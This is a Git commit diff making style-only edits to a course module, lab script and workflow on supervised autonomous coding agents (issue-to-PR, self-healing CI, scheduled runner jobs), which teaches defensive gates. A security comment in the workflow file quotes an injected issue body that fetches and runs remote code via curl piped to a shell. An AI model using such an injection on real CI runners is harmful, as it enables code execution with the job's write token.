style(no-slop): remove every em-dash + banned words across all modules + capstone
Apply the no-ai-slop standard (now binding in AGENTS.md): the em-dash character is banned outright (restructured, not blind-replaced), plus the banned word/phrase list (delve, leverage, robust, seamless, truly, unlock, etc.). 0 em-dashes remain in modules + capstone; the only "robust" left is the planted M10 ai-change.patch trap. Module H1 titles use a colon separator. All deliberate teaching devices preserved; labs compile/parse (py/sh/yaml/json); no junk. AGENTS.md updated with the hard no-slop rules. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01TfzV5QvtPDz8LJS3Pu5VLT
This commit is contained in:
@@ -1,6 +1,6 @@
|
||||
# Module 25 — Autonomous Agents: Issue-to-PR and Self-Healing CI
|
||||
# Module 25. Autonomous Agents: Issue-to-PR and Self-Healing CI
|
||||
|
||||
> **Now the AI acts on its own — takes an assigned issue, opens a pull request, even fixes its own
|
||||
> **Now the AI acts on its own: it takes an assigned issue, opens a pull request, even fixes its own
|
||||
> failing build.** The thing that makes that safe isn't watching it work. It's that everything it
|
||||
> produces still lands as a reviewable PR behind the same gates you already built.
|
||||
|
||||
@@ -43,7 +43,7 @@ By the end of this module you can:
|
||||
1. Explain the difference between *assistive* (Module 24) and *autonomous-but-supervised* agents, and
|
||||
state where supervision actually happens in each.
|
||||
2. Run an issue-to-PR agent: hand it a well-formed issue and have it produce a change on a branch
|
||||
that arrives as a reviewable pull request — not a merge.
|
||||
that arrives as a reviewable pull request, not a merge.
|
||||
3. Watch your existing CI / review / security gates catch a bad agent change before it can reach
|
||||
`main`, and explain why that's *structural* supervision rather than *behavioral*.
|
||||
4. Build a bounded self-healing loop: when a gate fails, feed the failure back to the agent for a
|
||||
@@ -62,12 +62,12 @@ read the suggestion and took the action. Supervision was **behavioral**: you wer
|
||||
every decision, watching, approving, clicking the button.
|
||||
|
||||
That doesn't scale, and watching an agent type is a terrible use of your attention anyway. This
|
||||
module makes the agent *take the action* — branch, edit files, commit, open a PR. The obvious worry
|
||||
module makes the agent *take the action*: branch, edit files, commit, open a PR. The obvious worry
|
||||
is: if I'm not watching, what stops it from shipping garbage?
|
||||
|
||||
The answer is the reframe of the whole unit:
|
||||
|
||||
> **You don't supervise an autonomous agent by watching it work. You supervise it structurally — by
|
||||
> **You don't supervise an autonomous agent by watching it work. You supervise it structurally, by
|
||||
> making everything it produces pass through gates that don't care whether a human or a machine wrote
|
||||
> the change.**
|
||||
|
||||
@@ -75,7 +75,7 @@ You already built those gates, for exactly this reason, before you needed them:
|
||||
|
||||
| Gate | Built in | What it catches on an agent's PR |
|
||||
|------|----------|----------------------------------|
|
||||
| **Review** | Module 10 | Plausible-but-wrong logic, scope creep, dropped edge cases — read the diff, not the agent's summary. |
|
||||
| **Review** | Module 10 | Plausible-but-wrong logic, scope creep, dropped edge cases. Read the diff, not the agent's summary. |
|
||||
| **CI** | Module 14 | Lint failures, broken tests, anything that doesn't build. Runs identically on a human's PR and an agent's. |
|
||||
| **Security** | Module 15 | Hardcoded secrets, vulnerable or hallucinated dependencies, SAST findings. |
|
||||
| **Recovery** | Module 12 | The backstop: if something slips through and merges, `revert` cleanly undoes it. |
|
||||
@@ -84,7 +84,7 @@ The agent is autonomous *inside* that box and powerless to escape it. It cannot
|
||||
check or an unapproved review. That's the entire safety model, and it's why this module sits at the
|
||||
end of the course instead of the start: the box had to exist first.
|
||||
|
||||
### Pattern 1 — Issue-to-PR
|
||||
### Pattern 1: Issue-to-PR
|
||||
|
||||
The headline pattern, and the one Module 9 set up when it called an agent a possible *assignee*. The
|
||||
loop is exactly the human collaboration loop from Module 11, with one participant swapped:
|
||||
@@ -111,10 +111,10 @@ full volume: a confident, plausible, wrong PR that costs more to review than the
|
||||
taken.
|
||||
|
||||
Crucially: the agent's last step is **open a PR**, not **merge**. The output is a proposal. Nothing
|
||||
about "autonomous" means "merges to `main` unseen" — if that's your mental model, this is where you
|
||||
about "autonomous" means "merges to `main` unseen"; if that's your mental model, this is where you
|
||||
fix it.
|
||||
|
||||
### Pattern 2 — Self-healing CI
|
||||
### Pattern 2: Self-healing CI
|
||||
|
||||
The second pattern points the agent at a *failure* instead of an issue. CI goes red on a branch; an
|
||||
agent reads the failing job's logs, proposes a fix, and pushes it back to the same branch so CI runs
|
||||
@@ -139,9 +139,9 @@ Two design rules make this safe rather than a runaway loop:
|
||||
**reviewable PR**: a human confirms it fixed the code, not the evidence. Self-healing CI proposes
|
||||
a fix; it doesn't certify one.
|
||||
|
||||
### Pattern 3 — Triggered and scheduled agent jobs
|
||||
### Pattern 3: Triggered and scheduled agent jobs
|
||||
|
||||
How does an agent *start* without you launching it? It runs as a runner job (Module 19) — the same
|
||||
How does an agent *start* without you launching it? It runs as a runner job (Module 19), the same
|
||||
machinery that runs your CI, pointed at an agent instead of a test suite. Two triggers cover almost
|
||||
everything:
|
||||
|
||||
@@ -152,7 +152,7 @@ everything:
|
||||
being a slogan.
|
||||
|
||||
Either way it's a job on a runner, which means everything Module 19 taught applies: hosted vs.
|
||||
self-hosted, whose compute, and — new and important here — **what credentials that job holds.** A
|
||||
self-hosted, whose compute, and, new and important here, **what credentials that job holds.** A
|
||||
scheduled agent with a push token and write access is unattended automation acting in your name. It
|
||||
needs scoped secrets (Module 17), ideally a sandboxed environment (Module 16), and a healthy
|
||||
suspicion of anything it reads, because an issue body or a dependency's README is untrusted input
|
||||
@@ -163,7 +163,7 @@ surface; treat it like one.
|
||||
|
||||
Here's the load-bearing idea of the module, and it's not about the model:
|
||||
|
||||
> **An autonomous agent is exactly as safe as the gates it lands behind — no safer.** How much
|
||||
> **An autonomous agent is exactly as safe as the gates it lands behind; no safer.** How much
|
||||
> autonomy you can responsibly grant is a property of *your CI, review, and security setup*, not of
|
||||
> how smart the model is.
|
||||
|
||||
@@ -203,8 +203,8 @@ the job is non-deterministic and persuasive**, and that changes what "automation
|
||||
## Hands-on lab
|
||||
|
||||
**Lab language:** Python (one orchestrator script) plus a little shell and Git. It runs on your own
|
||||
machine, any OS, against the `tasks-app` repo from Module 1 — no forge account or paid agent required
|
||||
to complete it.
|
||||
machine, any OS, against the `tasks-app` repo from Module 1, with no forge account or paid agent
|
||||
required to complete it.
|
||||
|
||||
You'll drive an issue-to-PR run and a self-healing loop *locally*, so the moving parts are visible
|
||||
and reproducible. The "PR" in the local lab is a branch plus a diff you review; the optional Part D
|
||||
@@ -214,7 +214,7 @@ shows how the exact same flow runs on a real forge as a triggered/scheduled job.
|
||||
|
||||
- Your `tasks-app` Git repo (Modules 1–2), with the `test_tasks.py` from Module 14 present and
|
||||
`pytest` and `ruff` installed (`pip install pytest ruff`). The lab runs these as the CI gate,
|
||||
locally — the same checks `ci.yml` runs in Module 14.
|
||||
locally, the same checks `ci.yml` runs in Module 14.
|
||||
- The starter files in this module's `lab/` folder:
|
||||
- `agent_runner.py`: the orchestrator. Drives the agent (real or simulated), then runs the gate,
|
||||
and only ever produces a branch + PR proposal, never a merge.
|
||||
@@ -225,18 +225,18 @@ shows how the exact same flow runs on a real forge as a triggered/scheduled job.
|
||||
- *Optional, for the "for real" path:* an agentic coding tool that has a non-interactive / headless /
|
||||
one-shot mode (most expose a flag for running a single prompt without the interactive UI). If you
|
||||
don't have one wired up, the script's `--simulate` mode demonstrates every gate and loop
|
||||
deterministically with no agent at all — do that first regardless.
|
||||
deterministically with no agent at all; do that first regardless.
|
||||
|
||||
> **What `--simulate` actually does — read this before Part A.** To stay deterministic and never
|
||||
> **What `--simulate` actually does (read this before Part A).** To stay deterministic and never
|
||||
> touch your real `cli.py` / `tasks.py`, `--simulate` does **not** implement
|
||||
> `issue-delete-command.md`. Instead it writes a small, self-contained stand-in (`agent_demo.py` with
|
||||
> a `discount()` function, plus its test) and runs the *real* gate (ruff + pytest) against that. So
|
||||
> Parts A–C exercise the machinery and the gates — not the delete feature itself. The issue is only
|
||||
> truly implemented in **Part D**, with a live agent. When you review the simulated diff you'll see
|
||||
> Parts A–C exercise the machinery and the gates, not the delete feature itself. The issue is only
|
||||
> actually implemented in **Part D**, with a live agent. When you review the simulated diff you'll see
|
||||
> the `discount()` demo, not a `delete` command; that's expected, and it's why the simulation is
|
||||
> reproducible enough to teach with.
|
||||
|
||||
### Part A — See the gate catch a bad change (simulated, no agent needed)
|
||||
### Part A: See the gate catch a bad change (simulated, no agent needed)
|
||||
|
||||
Copy `agent_runner.py` and `issue-delete-command.md` into your `tasks-app` folder, along with this
|
||||
module's `lab/.gitignore` (append its lines to the `.gitignore` you already have from Module 2 rather
|
||||
@@ -258,7 +258,7 @@ a change, the script runs the gate (`ruff check` then `pytest -q`), a test fails
|
||||
supervision. It didn't matter that the change looked plausible; the gate caught it, and nothing
|
||||
reached `main`.
|
||||
|
||||
### Part B — See a good change land as a PR proposal
|
||||
### Part B: See a good change land as a PR proposal
|
||||
|
||||
```bash
|
||||
python agent_runner.py issue-to-pr issue-delete-command.md --simulate good
|
||||
@@ -272,7 +272,7 @@ self-contained `discount()` stand-in, not a `delete` command. The review *motion
|
||||
you are the human gate, and that step doesn't go away just because an agent did the typing. The agent
|
||||
stops at a PR; it never merges.
|
||||
|
||||
### Part C — Run the self-healing loop
|
||||
### Part C: Run the self-healing loop
|
||||
|
||||
```bash
|
||||
python agent_runner.py self-heal --simulate bad
|
||||
@@ -284,7 +284,7 @@ fix, re-runs the gate, and repeats up to its retry cap. With `--simulate bad` th
|
||||
second attempt and the result is offered as a PR proposal. Run it with `--simulate stuck` to watch the
|
||||
cap trip: after N attempts it gives up and tags the work for a human instead of looping forever.
|
||||
|
||||
### Part D — Do it for real (optional)
|
||||
### Part D: Do it for real (optional)
|
||||
|
||||
Two ways to go from simulation to a genuine autonomous run:
|
||||
|
||||
@@ -302,7 +302,7 @@ Two ways to go from simulation to a genuine autonomous run:
|
||||
|
||||
2. **On a forge, triggered/scheduled.** Read `agent-job.yml`. It's a runner workflow (Module 19) that
|
||||
fires when an issue gets an `agent` label *and* on a nightly schedule, runs the agent on the
|
||||
runner, and opens a PR — which then hits your normal CI (Module 14) and security (Module 15) gates
|
||||
runner, and opens a PR, which then hits your normal CI (Module 14) and security (Module 15) gates
|
||||
and waits for review. Wiring it up needs a scoped token in your forge's secrets (Module 17); the
|
||||
file is commented with exactly what to set and what *not* to grant. This is the "workflow runs
|
||||
itself" endpoint, and it's intentionally the last thing you turn on.
|
||||
@@ -311,7 +311,7 @@ Two ways to go from simulation to a genuine autonomous run:
|
||||
|
||||
## Where it breaks
|
||||
|
||||
The honest limits — and for autonomous agents, the limits *are* the lesson:
|
||||
The honest limits, and for autonomous agents the limits *are* the lesson:
|
||||
|
||||
- **Your gates are the ceiling, and most gates are weaker than they look.** Thin test coverage,
|
||||
skipped security scans, or review-by-rubber-stamp don't just reduce quality, they directly set how
|
||||
@@ -319,12 +319,12 @@ The honest limits — and for autonomous agents, the limits *are* the lesson:
|
||||
The honest version of "should I let an agent do this unattended?" is "would my CI catch it if it got
|
||||
it wrong?"
|
||||
- **Self-healing can fix the evidence instead of the bug.** Editing the test until it passes, widening
|
||||
an exception so the error is swallowed, deleting an assertion — all turn CI green and all are wrong.
|
||||
an exception so the error is swallowed, deleting an assertion: all turn CI green and all are wrong.
|
||||
The bounded-retry cap stops the *loop*; only human review of the diff stops the *cheat*. Never let a
|
||||
self-heal PR auto-merge on green alone.
|
||||
- **"Autonomous" is not "auto-merge."** Everything in this module stops at a PR. The moment you wire
|
||||
an agent to merge its own work to `main` without a gate that a human controls, you've left supervised
|
||||
autonomy and you own whatever it ships. That's a deliberate decision, not a default — and it's out
|
||||
autonomy and you own whatever it ships. That's a deliberate decision, not a default, and it's out
|
||||
of scope for this course.
|
||||
- **Unattended agents are an attack surface, not just a convenience.** A scheduled agent holds
|
||||
credentials and reads untrusted input (issue bodies, comments, dependency files) straight into its
|
||||
@@ -336,7 +336,7 @@ The honest limits — and for autonomous agents, the limits *are* the lesson:
|
||||
concurrency, and put a human checkpoint on anything that hasn't converged.
|
||||
- **Flaky gates make autonomy actively worse.** A nondeterministic test that fails 1-in-5 will send a
|
||||
self-healing agent chasing a bug that isn't there. Autonomy demands *more* gate discipline than
|
||||
manual work, not less — fix the flake before you point an agent at it.
|
||||
manual work, not less. Fix the flake before you point an agent at it.
|
||||
|
||||
---
|
||||
|
||||
@@ -345,13 +345,13 @@ The honest limits — and for autonomous agents, the limits *are* the lesson:
|
||||
**You're done when:**
|
||||
|
||||
- You ran an issue-to-PR flow (simulated or real) and the result was a **branch + PR proposal**, not a
|
||||
merge — and you can point to exactly where a human or a gate still has to say yes.
|
||||
merge, and you can point to exactly where a human or a gate still has to say yes.
|
||||
- You watched the gate **reject a bad agent change** (`--simulate bad`) and accept a good one, and you
|
||||
can explain why that's structural supervision rather than watching the agent work.
|
||||
- You ran a self-healing loop, saw it propose a fix on failure, and saw the retry **cap trip**
|
||||
(`--simulate stuck`) instead of looping forever.
|
||||
- You can finish this sentence without hand-waving: *"I'd let an agent do X unattended because my
|
||||
gates would catch it if it got X wrong — specifically the gate from Module ___."*
|
||||
gates would catch it if it got X wrong, specifically the gate from Module ___."*
|
||||
- You can name the three patterns (issue-to-PR, self-healing CI, triggered/scheduled jobs) and the
|
||||
four gates that make any of them safe (review M10, CI M14, security M15, recovery M12).
|
||||
|
||||
|
||||
@@ -1,17 +1,17 @@
|
||||
# Keep the agent's proposed diff clean (Module 25, Part B).
|
||||
#
|
||||
# propose_pr() in agent_runner.py runs `git add -A` on purpose — a real agent (Part D) may touch
|
||||
# propose_pr() in agent_runner.py runs `git add -A` on purpose; a real agent (Part D) may touch
|
||||
# files you can't enumerate ahead of time, so staging everything is the correct behavior. This
|
||||
# .gitignore is what keeps that honest: it excludes the Python caches and the lab scaffolding you
|
||||
# copied into tasks-app, so the commit the agent proposes is ONLY its real change (agent_demo.py and
|
||||
# its test in the simulated path) — not binary .pyc noise or the orchestrator itself.
|
||||
# its test in the simulated path), not binary .pyc noise or the orchestrator itself.
|
||||
|
||||
# Python / tool caches
|
||||
__pycache__/
|
||||
.pytest_cache/
|
||||
.ruff_cache/
|
||||
|
||||
# Lab scaffolding copied into tasks-app for this module — not part of the agent's change.
|
||||
# Lab scaffolding copied into tasks-app for this module, not part of the agent's change.
|
||||
agent_runner.py
|
||||
issue-delete-command.md
|
||||
agent-job.yml
|
||||
|
||||
@@ -1,15 +1,15 @@
|
||||
# Reference: an autonomous agent running as a RUNNER JOB (Module 19) — triggered and scheduled.
|
||||
# Reference: an autonomous agent running as a RUNNER JOB (Module 19), triggered and scheduled.
|
||||
#
|
||||
# This is the "for real" version of agent_runner.py: instead of you launching the agent, the forge
|
||||
# launches it on a runner in response to an event or a timer, and the agent opens a PR. That PR then
|
||||
# hits your NORMAL gates — CI (Module 14), security scanning (Module 15), and human review (Module
|
||||
# 10) — exactly like a human's PR. The supervision is structural; this file just automates the start.
|
||||
# hits your NORMAL gates: CI (Module 14), security scanning (Module 15), and human review (Module
|
||||
# 10), exactly like a human's PR. The supervision is structural; this file just automates the start.
|
||||
#
|
||||
# GitHub Actions flavor (same as Module 14's ci.yml), so it goes in .github/workflows/. Equivalents:
|
||||
# * GitLab: a job with `rules:` on $CI_PIPELINE_SOURCE + a `workflow:` schedule.
|
||||
# * Forgejo/Gitea: the same YAML under .forgejo/workflows/ or .gitea/workflows/.
|
||||
#
|
||||
# DO NOT enable this blindly. Read the security notes at the bottom first — an unattended agent with a
|
||||
# DO NOT enable this blindly. Read the security notes at the bottom first; an unattended agent with a
|
||||
# write token is automation acting in your name. This is the last thing you turn on, on purpose.
|
||||
|
||||
name: agent-issue-to-pr
|
||||
@@ -18,7 +18,7 @@ on:
|
||||
# TRIGGERED: fire when an issue gets the `agent` label. Event in -> agent runs -> PR out.
|
||||
issues:
|
||||
types: [labeled]
|
||||
# SCHEDULED: also attempt work overnight. This is "the workflow runs itself" — keep it cheap.
|
||||
# SCHEDULED: also attempt work overnight. This is "the workflow runs itself", so keep it cheap.
|
||||
schedule:
|
||||
- cron: "0 6 * * *" # 06:00 UTC daily; adjust to your timezone and budget.
|
||||
|
||||
@@ -27,7 +27,7 @@ jobs:
|
||||
# Only run the triggered path when the label is actually `agent` (labeled events fire for ANY
|
||||
# label). The scheduled path has no label, so allow it through too.
|
||||
if: ${{ github.event_name == 'schedule' || github.event.label.name == 'agent' }}
|
||||
runs-on: ubuntu-latest # whose compute this is — see Module 19 for self-hosted runners.
|
||||
runs-on: ubuntu-latest # whose compute this is; see Module 19 for self-hosted runners.
|
||||
|
||||
# Least privilege (Module 17): grant ONLY what opening a PR needs. Not admin, not secrets access.
|
||||
permissions:
|
||||
@@ -49,13 +49,13 @@ jobs:
|
||||
|
||||
- name: Run the agent on a fresh branch
|
||||
env:
|
||||
# The agent's model credentials come from a SCOPED secret you set in the forge — never
|
||||
# The agent's model credentials come from a SCOPED secret you set in the forge, never
|
||||
# hardcoded here (Module 17). Keep this provider-neutral: it's whatever your agent needs.
|
||||
AGENT_API_KEY: ${{ secrets.AGENT_API_KEY }}
|
||||
# Point AGENT_CMD at your agentic tool's non-interactive / one-shot mode.
|
||||
AGENT_CMD: "your-agent-cli --print --prompt-file {prompt_file}"
|
||||
# The issue body is UNTRUSTED. Pass it through env, never interpolated into the run: script
|
||||
# below — see the security notes (Actions expression-injection) for why this matters.
|
||||
# below; see the security notes (Actions expression-injection) for why this matters.
|
||||
BODY: ${{ github.event.issue.body }}
|
||||
run: |
|
||||
git switch -c "agent/issue-${{ github.event.issue.number || github.run_id }}"
|
||||
@@ -74,9 +74,9 @@ jobs:
|
||||
|
||||
# --- Security notes (read before enabling) -------------------------------------------------------
|
||||
# * Actions expression-injection (THIS file, a different bug from prompt injection): never paste
|
||||
# ${{ github.event.issue.body }} — or any untrusted ${{ ... }} — directly into a run: script. The
|
||||
# ${{ github.event.issue.body }} (or any untrusted ${{ ... }}) directly into a run: script. The
|
||||
# ${{ }} is expanded into the script TEXT before the shell runs it, so a crafted issue body like
|
||||
# `"; curl evil | sh; "` executes on the runner before the agent is even invoked — with this job's
|
||||
# `"; curl evil | sh; "` executes on the runner before the agent is even invoked, with this job's
|
||||
# write token in scope. The fix above passes the body through env: (BODY) and reads it as "$BODY",
|
||||
# so the shell sees it as data, not code. Expression-injection attacks the runner's shell; prompt
|
||||
# injection (below) attacks the agent's reasoning. Defend against both.
|
||||
|
||||
@@ -1,19 +1,19 @@
|
||||
"""Module 25 lab — an autonomous-but-supervised agent orchestrator.
|
||||
"""Module 25 lab: an autonomous-but-supervised agent orchestrator.
|
||||
|
||||
This is the smallest honest version of the two patterns in the module:
|
||||
|
||||
* issue-to-pr — read an issue, let an agent implement it, run the gate, produce a PR PROPOSAL.
|
||||
* self-heal — run the gate; on failure, feed the failure back to the agent for a fix,
|
||||
* issue-to-pr : read an issue, let an agent implement it, run the gate, produce a PR PROPOSAL.
|
||||
* self-heal : run the gate; on failure, feed the failure back to the agent for a fix,
|
||||
bounded by a retry cap; produce a PR PROPOSAL.
|
||||
|
||||
The load-bearing idea is in one place and you should be able to point at it: the agent NEVER merges.
|
||||
Every path ends at `propose_pr()` — a branch, a commit, and the command *you* would run to open the
|
||||
Every path ends at `propose_pr()`: a branch, a commit, and the command *you* would run to open the
|
||||
PR. The CI/review/security gates (Modules 14/15/10) and recovery (Module 12) are what supervise it,
|
||||
not a human watching it type.
|
||||
|
||||
Run it two ways:
|
||||
|
||||
1. Simulated (no agent needed, fully deterministic) — see the machinery and the gates:
|
||||
1. Simulated (no agent needed, fully deterministic); see the machinery and the gates:
|
||||
python agent_runner.py issue-to-pr issue-delete-command.md --simulate good
|
||||
python agent_runner.py issue-to-pr issue-delete-command.md --simulate bad
|
||||
python agent_runner.py self-heal --simulate bad
|
||||
@@ -21,9 +21,9 @@ Run it two ways:
|
||||
|
||||
Simulation works on a SELF-CONTAINED demo target (agent_demo.py + test_agent_demo.py) so it is
|
||||
deterministic and never corrupts your real tasks-app files. The gate it runs (ruff + pytest) is
|
||||
the real one — the same checks Module 14's CI runs.
|
||||
the real one, the same checks Module 14's CI runs.
|
||||
|
||||
2. Real agent — drives your own agentic tool against the actual issue. Point AGENT_CMD at your
|
||||
2. Real agent: drives your own agentic tool against the actual issue. Point AGENT_CMD at your
|
||||
tool's non-interactive / one-shot mode, then drop --simulate:
|
||||
export AGENT_CMD='your-agent-cli --print --prompt-file {prompt_file}'
|
||||
python agent_runner.py issue-to-pr issue-delete-command.md
|
||||
@@ -52,7 +52,7 @@ CONFIG_CANDIDATES = ["AGENTS.md", ".agent/instructions.md", "agent-config.md"]
|
||||
|
||||
|
||||
# --------------------------------------------------------------------------------------------------
|
||||
# The gate — the same lint + test checks Module 14 runs in CI, run locally so they're reproducible.
|
||||
# The gate: the same lint + test checks Module 14 runs in CI, run locally so they're reproducible.
|
||||
# This is the structural supervision. It does not care whether a human or an agent wrote the change.
|
||||
# --------------------------------------------------------------------------------------------------
|
||||
def run_gate() -> tuple[bool, str]:
|
||||
@@ -65,7 +65,7 @@ def run_gate() -> tuple[bool, str]:
|
||||
try:
|
||||
proc = subprocess.run(cmd, capture_output=True, text=True)
|
||||
except FileNotFoundError:
|
||||
out.append(f" ! {cmd[0]} not installed — `pip install pytest ruff`. Treating as a gate FAIL.")
|
||||
out.append(f" ! {cmd[0]} not installed; run `pip install pytest ruff`. Treating as a gate FAIL.")
|
||||
ok = False
|
||||
continue
|
||||
out.append(proc.stdout.rstrip())
|
||||
@@ -78,7 +78,7 @@ def run_gate() -> tuple[bool, str]:
|
||||
|
||||
|
||||
# --------------------------------------------------------------------------------------------------
|
||||
# The agent — real (your tool) or simulated (deterministic, for the lab).
|
||||
# The agent: real (your tool) or simulated (deterministic, for the lab).
|
||||
# --------------------------------------------------------------------------------------------------
|
||||
def find_config() -> Path | None:
|
||||
env = os.environ.get("AGENT_CONFIG")
|
||||
@@ -93,14 +93,14 @@ def find_config() -> Path | None:
|
||||
def build_prompt(task: str, *, issue_path: Path | None = None, failure: str | None = None) -> str:
|
||||
"""Assemble the agent's brief: standing config (Module 5) + the specific task (issue or failure)."""
|
||||
parts = ["You are working in a Git repository on the current branch. Make the change directly in",
|
||||
"the files. Do not commit, push, or merge — just edit. Follow the project's conventions."]
|
||||
"the files. Do not commit, push, or merge; just edit. Follow the project's conventions."]
|
||||
config = find_config()
|
||||
if config:
|
||||
parts += ["", f"# Project conventions (from {config})", config.read_text()]
|
||||
if issue_path:
|
||||
parts += ["", "# Task (issue to implement)", issue_path.read_text()]
|
||||
if failure:
|
||||
parts += ["", "# A CI check just failed. Fix the CODE so it passes — do not weaken or delete",
|
||||
parts += ["", "# A CI check just failed. Fix the CODE so it passes; do not weaken or delete",
|
||||
"# the test to make it pass. Here is the failing output:", "```", failure, "```"]
|
||||
return "\n".join(parts)
|
||||
|
||||
@@ -134,21 +134,21 @@ def simulate_implement(variant: str) -> None:
|
||||
)
|
||||
if variant == "good":
|
||||
DEMO_SRC.write_text("def discount(price, pct):\n return price - price * pct / 100\n")
|
||||
else: # 'bad' — plausible but wrong: treats the percent as a flat amount.
|
||||
else: # 'bad': plausible but wrong, treats the percent as a flat amount.
|
||||
DEMO_SRC.write_text("def discount(price, pct):\n return price - pct\n")
|
||||
|
||||
|
||||
def simulate_fix(variant: str, attempt: int) -> None:
|
||||
if variant == "stuck":
|
||||
# The "agent" keeps producing plausible, still-wrong fixes — the loop must give up, not run forever.
|
||||
# The "agent" keeps producing plausible, still-wrong fixes, so the loop must give up, not run forever.
|
||||
DEMO_SRC.write_text(f"def discount(price, pct):\n return price - pct - {attempt}\n")
|
||||
else: # 'bad' — converges on the second attempt with the correct formula.
|
||||
else: # 'bad': converges on the second attempt with the correct formula.
|
||||
DEMO_SRC.write_text("def discount(price, pct):\n return price - price * pct / 100\n")
|
||||
|
||||
|
||||
def simulate_cleanup() -> None:
|
||||
"""Discard the simulator's demo artifacts. These are UNTRACKED new files, so `git restore`
|
||||
(which only touches tracked files) can't remove them — the simulator cleans up after itself."""
|
||||
(which only touches tracked files) can't remove them, so the simulator cleans up after itself."""
|
||||
for path in (DEMO_SRC, DEMO_TEST):
|
||||
path.unlink(missing_ok=True)
|
||||
|
||||
@@ -163,7 +163,7 @@ def in_git_repo() -> bool:
|
||||
|
||||
def ensure_branch(name: str) -> None:
|
||||
"""Create and switch to the agent's working branch. The orchestrator owns this git step the same
|
||||
way agent-job.yml's runner does (`git switch -c`) — you direct the automation and then verify the
|
||||
way agent-job.yml's runner does (`git switch -c`): you direct the automation and then verify the
|
||||
branch (`git branch`), instead of typing `git checkout` by hand. No-op outside a Git repo."""
|
||||
if not in_git_repo():
|
||||
return
|
||||
@@ -175,7 +175,7 @@ def ensure_branch(name: str) -> None:
|
||||
|
||||
def propose_pr(message: str) -> None:
|
||||
print("\n" + "=" * 80)
|
||||
print("GATE PASSED. Proposing a PR — NOT merging. A human reviews the diff (Module 10).")
|
||||
print("GATE PASSED. Proposing a PR, NOT merging. A human reviews the diff (Module 10).")
|
||||
print("=" * 80)
|
||||
if in_git_repo():
|
||||
subprocess.run(["git", "add", "-A"])
|
||||
@@ -188,7 +188,7 @@ def propose_pr(message: str) -> None:
|
||||
print(f" git push -u origin {branch}")
|
||||
print(" # ...and open a pull request on your forge. CI + security gates run there.")
|
||||
else:
|
||||
print("\n(Not a Git repo — skipping commit. In your tasks-app this would commit to the branch.)")
|
||||
print("\n(Not a Git repo, so skipping commit. In your tasks-app this would commit to the branch.)")
|
||||
print("\nThe agent stops here. It cannot merge. That is the whole safety model.")
|
||||
|
||||
|
||||
@@ -249,14 +249,14 @@ def cmd_self_heal(simulate: str | None) -> int:
|
||||
print(gate_output)
|
||||
if attempt > RETRY_CAP - 1:
|
||||
break
|
||||
print(f"\n[self-heal] gate red — attempt {attempt}/{RETRY_CAP - 1}: asking the agent for a fix.")
|
||||
print(f"\n[self-heal] gate red, attempt {attempt}/{RETRY_CAP - 1}: asking the agent for a fix.")
|
||||
if simulate:
|
||||
simulate_fix(simulate, attempt)
|
||||
else:
|
||||
run_real_agent(build_prompt("fix", failure=gate_output))
|
||||
|
||||
print("\n" + "=" * 80)
|
||||
print(f"SELF-HEAL GAVE UP after {RETRY_CAP - 1} attempts. Handing off to a human — NOT looping forever.")
|
||||
print(f"SELF-HEAL GAVE UP after {RETRY_CAP - 1} attempts. Handing off to a human, NOT looping forever.")
|
||||
print("This cap is what stops an agent burning a runner bill chasing a flaky or impossible fix.")
|
||||
print("=" * 80)
|
||||
return 2
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
<!--
|
||||
The agent's INPUT for Module 25. This is a well-formed issue in the Module 9 format: title,
|
||||
context, acceptance criteria, scope. It is deliberately a good candidate for an agent — well-
|
||||
context, acceptance criteria, scope. It is deliberately a good candidate for an agent: well-
|
||||
scoped, concrete, and it mirrors a pattern already in the codebase (the existing `done` command).
|
||||
|
||||
The orchestrator (agent_runner.py) reads this file and pairs it with your committed AI config
|
||||
@@ -15,7 +15,7 @@
|
||||
|
||||
`tasks-app` can `add`, `list`, and mark a task `done`, but there's no way to remove a task. Once a
|
||||
task is added by mistake it stays forever. The `done` command already takes an index and mutates the
|
||||
list through a method on `TaskList`, so a `delete` command should follow the exact same shape — this
|
||||
list through a method on `TaskList`, so a `delete` command should follow the exact same shape. This
|
||||
is a patterned change, not a design problem.
|
||||
|
||||
## Acceptance criteria
|
||||
@@ -25,7 +25,7 @@ is a patterned change, not a design problem.
|
||||
- `delete` with an out-of-range or non-integer index prints a clear error (e.g.
|
||||
`no task at index 99`) and exits non-zero, instead of dumping a traceback.
|
||||
- The logic lives on `TaskList` (a `remove(index)` method or equivalent), mirroring how `complete`
|
||||
works — `cli.py` only parses arguments and calls it.
|
||||
works; `cli.py` only parses arguments and calls it.
|
||||
- A test covers: a successful delete removes the right task, and an out-of-range delete is handled.
|
||||
|
||||
## Out of scope
|
||||
|
||||
Reference in New Issue
Block a user